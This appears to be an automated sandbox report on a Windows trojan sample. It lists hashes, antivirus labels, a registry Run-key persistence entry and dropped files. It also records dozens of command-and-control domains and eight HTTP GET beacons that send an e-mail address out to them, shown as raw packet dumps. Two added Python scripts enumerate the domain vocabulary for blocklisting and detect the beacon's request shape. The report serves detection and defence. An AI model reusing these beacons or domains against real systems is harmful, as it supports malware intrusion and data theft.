Analysis Date: 2015-07-27 20:48:46
MD5: c4dcc77dc5e7c02bf91923756785371f
SHA1: b4e6c12c96221bd85b095b1d84cf31be1e92115b

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: 6cbdb3bc1ca0006235e4222d99fa5ff3   sha1: 0bcb3689a6c3e0fcd722b6922eec11bfbae6c917   size: 295936
Section .rdata  md5: 132926de0365285fa9af36bb1720114d   sha1: fa59dc118c76a0c4f80089ec6fdc35bb9fcbb3db   size: 33792
Section .data   md5: 85ee09fd36df20be134ae4e3b38d7711   sha1: 64901328b3c3d719cfdab302bf0c568b9468302b   size: 103424
Timestamp: 2014-10-30 10:26:28
Packer: Microsoft Visual C++ ?.?
PEhash: c7362e3448e1cdf67464afabedf4088e8797bdb1
IMPhash: 64b8754bab60b6dca5d1bd4affbdde0c
AV Rising: no_virus
AV Mcafee: Trojan-FEMT!C4DCC77DC5E7
AV Avira (antivir): BDS/Zegost.Gen4
AV Twister: Trojan.Agent.VNC.aanx.mg
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Alwil (avast): Downloader-TLD [Trj]
AV Eset (nod32): Win32/Agent.VNC
AV Grisoft (avg): Win32/Cryptor
AV Symantec: Downloader.Upatre!g15
AV Fortinet: W32/Kryptik.DDQD!tr
AV BitDefender: Gen:Variant.Symmi.22722
AV K7: no_virus
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.BD
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV MalwareBytes: Trojan.Zbot.WHE
AV Authentium: W32/Wonton.B2.gen!Eldorado
AV Frisk (f-prot): no_virus
AV Ikarus: Trojan.FBAccountLock
AV Emsisoft: Gen:Variant.Symmi.22722
AV Zillya!: Trojan.Agent.Win32.546244
AV Kaspersky: Trojan.Win32.Generic
AV Trend Micro: TSPY_NIVDORT.SMB
AV CAT (quickheal): Trojan.Dynamer.AC3
AV VirusBlokAda (vba32): no_virus
AV Padvish: no_virus
AV BullGuard: Gen:Variant.Symmi.22722
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV ClamAV: no_virus
AV Dr. Web: no_virus
AV F-Secure: Gen:Variant.Symmi.22722
AV CA (E-Trust Ino): no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Connections Encryption SNMP Cache ➝ C:\Documents and Settings\Administrator\Application Data\zzbtpoczuadsnx\gxdxnthgi.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\zzbtpoczuadsnx\gxdxnthgi.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\zzbtpoczuadsnx\gxdxnthgi.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\zzbtpoczuadsnx\gxdxnthgi.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\zzbtpoczuadsnx\nxlpugclxlai.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\zzbtpoczuadsnx\gxdxnthgi.lrb8
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\zzbtpoczuadsnx\gxdxnthgi.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\zzbtpoczuadsnx\gxdxnthgi.exe"

Network Details:

DNS A: sweetsmell.net ➝ 54.246.123.138
DNS A: simplehealth.net ➝ 98.124.198.1
DNS A: possibleseparate.net ➝ 208.91.197.241
DNS A: mountainhealth.net ➝ 69.64.147.249
DNS A: winterclothes.net ➝ 66.151.181.49
DNS A: leaveseparate.net ➝ 95.211.230.75
DNS A: sweethealth.net ➝ 50.63.202.3
DNS A: materialhealth.net ➝ 50.63.202.57
DNS A: leavesmell.net
DNS A: finishearly.net
DNS A: leaveearly.net
DNS A: finishsafety.net
DNS A: leavesafety.net
DNS A: finishfuture.net
DNS A: leavefuture.net
DNS A: probablysmell.net
DNS A: sweetearly.net
DNS A: probablyearly.net
DNS A: sweetsafety.net
DNS A: probablysafety.net
DNS A: sweetfuture.net
DNS A: probablyfuture.net
DNS A: severalsmell.net
DNS A: materialsmell.net
DNS A: severalearly.net
DNS A: materialearly.net
DNS A: severalsafety.net
DNS A: materialsafety.net
DNS A: severalfuture.net
DNS A: materialfuture.net
DNS A: severaseparate.net
DNS A: laughseparate.net
DNS A: severahealth.net
DNS A: laughhealth.net
DNS A: severaclothes.net
DNS A: laughclothes.net
DNS A: severadistant.net
DNS A: laughdistant.net
DNS A: simpleseparate.net
DNS A: motherseparate.net
DNS A: motherhealth.net
DNS A: simpleclothes.net
DNS A: motherclothes.net
DNS A: simpledistant.net
DNS A: motherdistant.net
DNS A: mountainseparate.net
DNS A: possiblehealth.net
DNS A: mountainclothes.net
DNS A: possibleclothes.net
DNS A: mountaindistant.net
DNS A: possibledistant.net
DNS A: perhapsseparate.net
DNS A: windowseparate.net
DNS A: perhapshealth.net
DNS A: windowhealth.net
DNS A: perhapsclothes.net
DNS A: windowclothes.net
DNS A: perhapsdistant.net
DNS A: windowdistant.net
DNS A: winterseparate.net
DNS A: subjectseparate.net
DNS A: winterhealth.net
DNS A: subjecthealth.net
DNS A: subjectclothes.net
DNS A: winterdistant.net
DNS A: subjectdistant.net
DNS A: finishseparate.net
DNS A: finishhealth.net
DNS A: leavehealth.net
DNS A: finishclothes.net
DNS A: leaveclothes.net
DNS A: finishdistant.net
DNS A: leavedistant.net
DNS A: sweetseparate.net
DNS A: probablyseparate.net
DNS A: probablyhealth.net
DNS A: sweetclothes.net
DNS A: probablyclothes.net
DNS A: sweetdistant.net
DNS A: probablydistant.net
DNS A: severalseparate.net
DNS A: materialseparate.net
DNS A: severalhealth.net
DNS A: severalclothes.net
DNS A: materialclothes.net
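Every name in the DNS list above is two dictionary words joined under .net, drawn from a small vocabulary (sixteen first words including the as-queried "severa", eight second words). The script below is an added example, not part of the sandbox report and not a claim about how the sample actually generates names: it reads the vocabulary off the observed queries, decomposes each domain into its two words, and enumerates the full word product as a hunting/blocklist candidate list. The OBSERVED list is a subset copied from the DNS entries above; the function names are this example's own.

```python
from itertools import product

# Vocabulary read off the DNS queries in the report: every name is <first><second>.net.
# "severa" is kept exactly as it was queried (severaseparate.net, severahealth.net, ...).
FIRST = {"sweet", "simple", "possible", "mountain", "winter", "leave", "material", "finish",
         "probably", "several", "severa", "laugh", "mother", "perhaps", "window", "subject"}
SECOND = {"smell", "health", "separate", "clothes", "early", "safety", "future", "distant"}
TLD = ".net"

# A subset of the queried names, copied from the DNS list above.
OBSERVED = [
    "sweetsmell.net", "simplehealth.net", "possibleseparate.net", "mountainhealth.net",
    "winterclothes.net", "leaveseparate.net", "sweethealth.net", "materialhealth.net",
    "leavesmell.net", "finishearly.net", "severaseparate.net", "laughdistant.net",
    "severalearly.net", "subjectclothes.net", "windowdistant.net", "probablyfuture.net",
]


def split_domain(domain, first=FIRST, second=SECOND, tld=TLD):
    """Return (first_word, second_word) when domain is exactly first+second+tld, else None.

    Every split point is tried, so a first word that is a prefix of another one
    ("severa" / "several") is resolved by whichever split leaves a valid second word.
    """
    label = domain.lower()
    if not label.endswith(tld):
        return None
    label = label[: -len(tld)]
    for i in range(1, len(label)):
        w1, w2 = label[:i], label[i:]
        if w1 in first and w2 in second:
            return (w1, w2)
    return None


def candidate_domains(first=FIRST, second=SECOND, tld=TLD):
    """Full product of the vocabulary: a hunting list, not a statement about the sample's generator."""
    return sorted(w1 + w2 + tld for w1, w2 in product(first, second))


def triage(domains):
    """Map each domain to its decomposition (None if it does not fit) and count the fits."""
    decomposed = {d: split_domain(d) for d in domains}
    matched = sum(1 for v in decomposed.values() if v is not None)
    return decomposed, matched


def unseen_candidates(observed, first=FIRST, second=SECOND, tld=TLD):
    """Vocabulary combinations not yet queried in this run (sinkhole/blocklist candidates)."""
    seen = {d.lower() for d in observed}
    return [d for d in candidate_domains(first, second, tld) if d not in seen]


if __name__ == "__main__":
    decomposed, matched = triage(OBSERVED)
    for d, words in decomposed.items():
        print(d, "->", words)
    print(matched, "of", len(OBSERVED), "observed names fit the vocabulary;",
          len(unseen_candidates(OBSERVED)), "combinations not yet seen")
```

Treat the product list as a starting point for passive-DNS or proxy-log searches on your own vocabulary observations; a vocabulary inferred from one sandbox run will miss words the sample did not happen to query during the capture.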
HTTP GET: http://sweetsmell.net/index.php?email=info@dharmams.com&method=post&len (User-Agent: empty)
HTTP GET: http://simplehealth.net/index.php?email=info@dharmams.com&method=post&len (User-Agent: empty)
HTTP GET: http://possibleseparate.net/index.php?email=info@dharmams.com&method=post&len (User-Agent: empty)
HTTP GET: http://mountainhealth.net/index.php?email=info@dharmams.com&method=post&len (User-Agent: empty)
HTTP GET: http://winterclothes.net/index.php?email=info@dharmams.com&method=post&len (User-Agent: empty)
HTTP GET: http://leaveseparate.net/index.php?email=info@dharmams.com&method=post&len (User-Agent: empty)
HTTP GET: http://sweethealth.net/index.php?email=info@dharmams.com&method=post&len (User-Agent: empty)
HTTP GET: http://materialhealth.net/index.php?email=info@dharmams.com&method=post&len (User-Agent: empty)
Flows TCP: 192.168.1.1:1031 ➝ 54.246.123.138:80
Flows TCP: 192.168.1.1:1032 ➝ 98.124.198.1:80
Flows TCP: 192.168.1.1:1033 ➝ 208.91.197.241:80
Flows TCP: 192.168.1.1:1034 ➝ 69.64.147.249:80
Flows TCP: 192.168.1.1:1035 ➝ 66.151.181.49:80
Flows TCP: 192.168.1.1:1036 ➝ 95.211.230.75:80
Flows TCP: 192.168.1.1:1037 ➝ 50.63.202.3:80
Flows TCP: 192.168.1.1:1038 ➝ 50.63.202.57:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2073 77656574 736d656c   .Host: sweetsmel
0x00000070 (00112)   6c2e6e65 740d0a0d 0a                  l.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2073 696d706c 65686561   .Host: simplehea
0x00000070 (00112)   6c74682e 6e65740d 0a0d0a              lth.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2070 6f737369 626c6573   .Host: possibles
0x00000070 (00112)   65706172 6174652e 6e65740d 0a0d0a     eparate.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a206d 6f756e74 61696e68   .Host: mountainh
0x00000070 (00112)   65616c74 682e6e65 740d0a0d 0a0d0a     ealth.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2077 696e7465 72636c6f   .Host: winterclo
0x00000070 (00112)   74686573 2e6e6574 0d0a0d0a 0a0d0a     thes.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a206c 65617665 73657061   .Host: leavesepa
0x00000070 (00112)   72617465 2e6e6574 0d0a0d0a 0a0d0a     rate.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2073 77656574 6865616c   .Host: sweetheal
0x00000070 (00112)   74682e6e 65740d0a 0d0a0d0a 0a0d0a     th.net.........

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a206d 61746572 69616c68   .Host: materialh
0x00000070 (00112)   65616c74 682e6e65 740d0a0d 0a0d0a     ealth.net......
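The eight requests in the Raw Pcap section are identical apart from the Host header: GET /index.php with email=, method=post and a bare len parameter, HTTP/1.0, Accept and Connection headers only, and no User-Agent at all. That combination is a usable network signature. The script below is an added example, not part of the sandbox report: it decodes the hex dumps back into bytes, parses the request, and applies that signature. The two dumps embedded are copied from the Raw Pcap above (the mountainhealth.net one keeps the extra trailing CRLF bytes the dump shows); the benign request is constructed for contrast, and the function names are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Copied from the Raw Pcap section above.
SWEETSMELL_DUMP = """
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2073 77656574 736d656c   .Host: sweetsmel
0x00000070 (00112)   6c2e6e65 740d0a0d 0a                  l.net....
"""
MOUNTAINHEALTH_DUMP = """
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a206d 6f756e74 61696e68   .Host: mountainh
0x00000070 (00112)   65616c74 682e6e65 740d0a0d 0a0d0a     ealth.net......
"""

# Constructed benign request (not from the report) so the classifier has a negative case.
BENIGN_REQUEST = (b"GET /index.php?page=1 HTTP/1.1\r\nHost: example.org\r\n"
                  b"User-Agent: Mozilla/5.0\r\nAccept: */*\r\n\r\n")

# hex offset, decimal offset, then one to four hex groups; the ASCII column (or end of line)
# is separated from the hex by at least two spaces, which is what stops the lazy group.
_HEX_LINE = re.compile(r"^\s*0x[0-9A-Fa-f]+\s+\(\d+\)\s+([0-9A-Fa-f ]+?)(?:\s{2,}|\s*$)")


def hexdump_to_bytes(dump):
    """Rebuild the raw bytes from a dump in the report's offset/hex/ASCII layout."""
    out = bytearray()
    for line in dump.splitlines():
        m = _HEX_LINE.match(line)
        if m:
            out += bytes.fromhex(m.group(1).replace(" ", ""))
    return bytes(out)


def parse_http_request(raw):
    """Split a raw HTTP request into method, path, query dict, version and lower-cased headers."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("ascii", errors="replace").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        if ":" in h:
            k, v = h.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    parts = urlsplit(target)
    query = dict(parse_qsl(parts.query, keep_blank_values=True))  # keeps the bare "len"
    return {"method": method, "path": parts.path, "query": query,
            "version": version, "headers": headers}


def matches_beacon(req):
    """The request shape seen in every flow of this run."""
    q = req["query"]
    return (req["method"] == "GET"
            and req["path"] == "/index.php"
            and req["version"] == "HTTP/1.0"
            and "email" in q and q.get("method") == "post" and "len" in q
            and "user-agent" not in req["headers"])


def triage(dumps):
    """Host, submitted e-mail address and signature verdict for each dump."""
    rows = []
    for dump in dumps:
        req = parse_http_request(hexdump_to_bytes(dump))
        rows.append({"host": req["headers"].get("host"),
                     "email": req["query"].get("email"),
                     "beacon": matches_beacon(req)})
    return rows


if __name__ == "__main__":
    for row in triage([SWEETSMELL_DUMP, MOUNTAINHEALTH_DUMP]):
        print(row)
```

The absence of a User-Agent header is the cheapest single discriminator here: ordinary browsers and most HTTP libraries always send one, so a proxy rule for GET /index.php?email= with no User-Agent will match this traffic without keying on any of the rotating hostnames.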


Strings